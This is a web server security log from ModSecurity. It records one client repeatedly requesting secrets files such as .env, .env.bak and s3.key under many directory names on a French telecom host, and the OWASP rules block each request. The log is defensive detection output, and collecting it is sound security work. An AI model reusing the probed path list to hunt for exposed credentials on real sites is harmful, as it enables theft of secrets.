[Mon May 11 20:56:03.163922 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agImQ5Yn-x0CHsbEbP2t6AAAAIo"]
[Mon May 11 20:56:03.164114 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agImQ5Yn-x0CHsbEbP2t6AAAAIo"]
[Mon May 11 20:56:03.164308 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agImQ5Yn-x0CHsbEbP2t6AAAAIo"]
[Mon May 11 20:56:03.211793 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agImQ5Yn-x0CHsbEbP2t6gAAAIo"]
[Mon May 11 20:56:03.211995 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agImQ5Yn-x0CHsbEbP2t6gAAAIo"]
[Mon May 11 20:56:03.212198 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agImQ5Yn-x0CHsbEbP2t6gAAAIo"]
[Mon May 11 20:56:03.230717 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node/backend/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTNwAAAVM"]
[Mon May 11 20:56:03.230899 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node/backend/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTNwAAAVM"]
[Mon May 11 20:56:03.231223 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node/backend/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTNwAAAVM"]
[Mon May 11 20:56:03.253532 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public-api/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOAAAAVM"]
[Mon May 11 20:56:03.253800 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public-api/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOAAAAVM"]
[Mon May 11 20:56:03.254065 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public-api/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOAAAAVM"]
[Mon May 11 20:56:03.273464 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agImQ1NddpkriGUb6ZV2-AAAARg"]
[Mon May 11 20:56:03.273700 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agImQ1NddpkriGUb6ZV2-AAAARg"]
[Mon May 11 20:56:03.273922 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agImQ1NddpkriGUb6ZV2-AAAARg"]
[Mon May 11 20:56:03.302273 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOgAAAVM"]
[Mon May 11 20:56:03.302578 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOgAAAVM"]
[Mon May 11 20:56:03.302865 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOgAAAVM"]
[Mon May 11 20:56:03.326783 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/product/.env"] [unique_id "agImQ1NddpkriGUb6ZV2-QAAARg"]
[Mon May 11 20:56:03.326986 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/product/.env"] [unique_id "agImQ1NddpkriGUb6ZV2-QAAARg"]
[Mon May 11 20:56:03.327210 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/product/.env"] [unique_id "agImQ1NddpkriGUb6ZV2-QAAARg"]
[Mon May 11 20:56:03.402179 2026] [proxy_fcgi:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:03.457029 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOwAAAVU"]
[Mon May 11 20:56:03.457246 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOwAAAVU"]
[Mon May 11 20:56:03.457555 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTOwAAAVU"]
[Mon May 11 20:56:03.471056 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agImQzP5Q_-MBliRCAxn3wAAAAI"]
[Mon May 11 20:56:03.471388 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agImQzP5Q_-MBliRCAxn3wAAAAI"]
[Mon May 11 20:56:03.471718 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agImQzP5Q_-MBliRCAxn3wAAAAI"]
[Mon May 11 20:56:03.578112 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/s3.key"] [unique_id "agImQ5Yn-x0CHsbEbP2t7QAAAIo"]
[Mon May 11 20:56:03.578406 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/s3.key"] [unique_id "agImQ5Yn-x0CHsbEbP2t7QAAAIo"]
[Mon May 11 20:56:03.578601 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/s3.key"] [unique_id "agImQ5Yn-x0CHsbEbP2t7QAAAIo"]
[Mon May 11 20:56:03.636708 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /s3/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/s3/.env.bak"] [unique_id "agImQyMeXtzav-mi9Syx4wAAAMo"]
[Mon May 11 20:56:03.636873 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/s3/.env.bak"] [unique_id "agImQyMeXtzav-mi9Syx4wAAAMo"]
[Mon May 11 20:56:03.637049 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/s3/.env.bak"] [unique_id "agImQyMeXtzav-mi9Syx4wAAAMo"]
[Mon May 11 20:56:03.701530 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTPgAAAUY"]
[Mon May 11 20:56:03.701741 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTPgAAAUY"]
[Mon May 11 20:56:03.701958 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTPgAAAUY"]
[Mon May 11 20:56:03.727803 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/server/backend/.env"] [unique_id "agImQyMeXtzav-mi9Syx6AAAANg"]
[Mon May 11 20:56:03.728004 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/server/backend/.env"] [unique_id "agImQyMeXtzav-mi9Syx6AAAANg"]
[Mon May 11 20:56:03.728229 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/server/backend/.env"] [unique_id "agImQyMeXtzav-mi9Syx6AAAANg"]
